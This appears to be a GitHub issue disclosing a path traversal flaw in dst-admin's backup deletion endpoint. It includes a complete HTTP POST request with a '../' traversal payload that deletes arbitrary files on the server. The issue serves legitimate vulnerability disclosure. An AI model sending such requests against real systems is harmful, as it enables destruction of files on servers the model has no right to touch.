A security issue.

There is a security issue in your code.
This security flaw can delete arbitrary system files.

Here is the example.
<img width="879" alt="image" src="https://github.com/qinming99/dst-admin/assets/51190455/0488b03a-be77-47fe-beba-79db4bca22ec">

Here I first created a delete.txt file and then deleted the file through this vulnerability.
<img width="913" alt="image" src="https://github.com/qinming99/dst-admin/assets/51190455/1064e48d-5030-489a-9b8d-5bfa24732829">

And the http data is:
`POST /backup/deleteBackup HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=UTF-8
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/backup/index
Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh-CN; JSESSIONID=559259c4-c298-4fa4-86e3-282d013fcb1d
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

["../../../../../../../../../../delete.txt"]`

The following is the vulnerability trigger point, which does not control or filter the content input by the user.
<img width="578" alt="image" src="https://github.com/qinming99/dst-admin/assets/51190455/1e241cbc-47c5-4780-a10f-f266bf1894b3">
<img width="657" alt="image" src="https://github.com/qinming99/dst-admin/assets/51190455/f4779837-e318-4424-8649-1b0123d77318">





Provide feedback

Saved searches

Use saved searches to filter your results more quickly

A security issue. #81

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

A security issue. #81

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions